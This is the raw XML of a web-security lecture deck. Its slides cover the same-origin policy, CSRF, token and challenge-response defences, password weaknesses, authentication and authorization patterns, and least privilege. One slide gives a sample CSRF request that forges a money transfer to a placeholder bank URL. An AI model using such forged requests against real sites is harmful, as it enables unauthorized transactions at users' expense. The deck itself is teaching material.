  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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5" name="Same origin Policy"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Same origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1948" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1115741" y="2271884"/>
            <a:ext cx="10250758" cy="1660815"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="10250757" cy="1660814"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1946" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="10198059" cy="1660815"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 117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947" name="$.post('http://bank.com/transfer', { to: 'ciro', ammount: '100' })"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="81073" y="263886"/>
              <a:ext cx="10169685" cy="11330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l" defTabSz="914400">
                <a:defRPr sz="2400">
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>$.post('http://bank.com/transfer', { to: 'ciro', ammount: '100' })</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1949" name="CSRF does not violate the Same-Origin Policy For JavaScript because the SOP is concerned with JavaScript reading the server's response to a clients request.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450682" y="5208530"/>
            <a:ext cx="12272775" cy="1552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2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>CSRF does not violate the Same-Origin Policy For JavaScript because the SOP is concerned with JavaScript reading the server's response to a clients request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>CSRF attacks don't care about the response, they care about a side-effect, or state change produced by the request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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54" name="To prevent cross-origin writes, check for an unguessable token in the request…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="174626" y="3673855"/>
            <a:ext cx="12831984" cy="2263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914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>To prevent cross-origin writes, check for an unguessable token in the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>To prevent cross-origin reads of a resource, ensure that it is not embeddable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>To prevent cross-origin embedding, ensure that your resource can not be interpreted as one of the embeddable formats </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide2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6" name="Cross-origin writes are typically allowed: links, redirects and form submissions.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cross-origin writes are typically allowed: links, redirects and form submissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cross-origin embedding is typically allowed: images, external CSS and Javascript, iframes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Cross-origin reads are typically not allowed: XHR (example above), iframe read.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19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9" name="Origin Policy…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Origin Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Synchronizer Token </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Challenge-Response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928687" indent="-471487">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>CAPTCHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928687" indent="-471487">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>Re-Authentication (password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928687" indent="-471487">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>One-time Token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19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7" name="“Remember Me” Functionality"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="914400">
              <a:defRPr sz="5400">
                <a:latin typeface="Constantia"/>
                <a:ea typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:sym typeface="Constantia"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>“Remember Me” Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="This function is often insecure by design and leaves the user exposed to attack both locally and by users on other computers."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="388620" indent="-388620" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>This function is often insecure by design and leaves the user exposed to attack both locally and by users on </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>other </a:t>
            </a:r>
            <a:r>
              <a:t>computers.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0" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Bad Passwords…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="388620" indent="-388620" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3400">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Bad Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3000">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Very short or blank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3000">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Common dictionary words or names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3000">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Set to the same as the username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="739832" indent="-374072" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AA2B1E"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="Brush Script MT"/>
              <a:buChar char="O"/>
              <a:defRPr sz="3000">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:ea typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:sym typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Still set to a default value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3" name="Authentication Patterns"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Authentication Patterns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714" name="By What you Know…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="2603500"/>
            <a:ext cx="11099800" cy="4669904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="300037" indent="-300037" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="4400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>By What you Know</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Password, Secret question, Security Key, Security Pin, Security Pattern???</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="4400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>By What you Have</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>OTP, Certificate, RSA, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:defRPr sz="4400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>By What you Are</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="742950" indent="-285750" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="3800">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Voice, Face, Retina, Finger Print, …</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6" name="Authentication Patterns"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Authentication Patterns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717" name="2 factor Authentication…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="2603500"/>
            <a:ext cx="11099800" cy="3085252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>2 factor Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Multi factor Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Headless Authentication</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9" name="Elevation of Privileges"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Elevation of Privileges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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3" name="Performance Engineering…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="514095">
              <a:defRPr sz="7040"/>
            </a:pPr>
            <a:r>
              <a:t>Performance Engineering </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="514095">
              <a:defRPr sz="7040"/>
            </a:pPr>
            <a:r>
              <a:t>v/s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="514095">
              <a:defRPr sz="7040"/>
            </a:pPr>
            <a:r>
              <a:t> Performance Tuning</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2" name="Authorization Patterns"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Authorization Patterns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="723" name="Role Based…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2926079"/>
            <a:ext cx="11704322" cy="6502401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Role Based</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="300037" indent="-300037">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Claim Based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723">
                                            <p:bg/>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="723">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723">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="723">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="11" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12" presetClass="entr" nodeType="afterEffect" presetID="9" grpId="1" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="723">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="723">
                                            <p:txEl>
                                              <p:pRg st="1" end="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723" grpId="1"/>
    </p:bld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5" name="Principle of Least Privilege"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Principle of Least Privilege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7" name="A3 : Sensitive Data Exposure"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A3 : Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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0" name="Tampering…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="667512">
              <a:defRPr sz="4526"/>
            </a:pPr>
            <a:r>
              <a:t>Tampering </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="667512">
              <a:defRPr sz="4526"/>
            </a:pPr>
            <a:r>
              <a:t>&amp; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="667512">
              <a:defRPr sz="4526"/>
            </a:pPr>
            <a:r>
              <a:t>Information Disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7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3" name="Types of Asset"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Types of Asset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="LOB Data…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
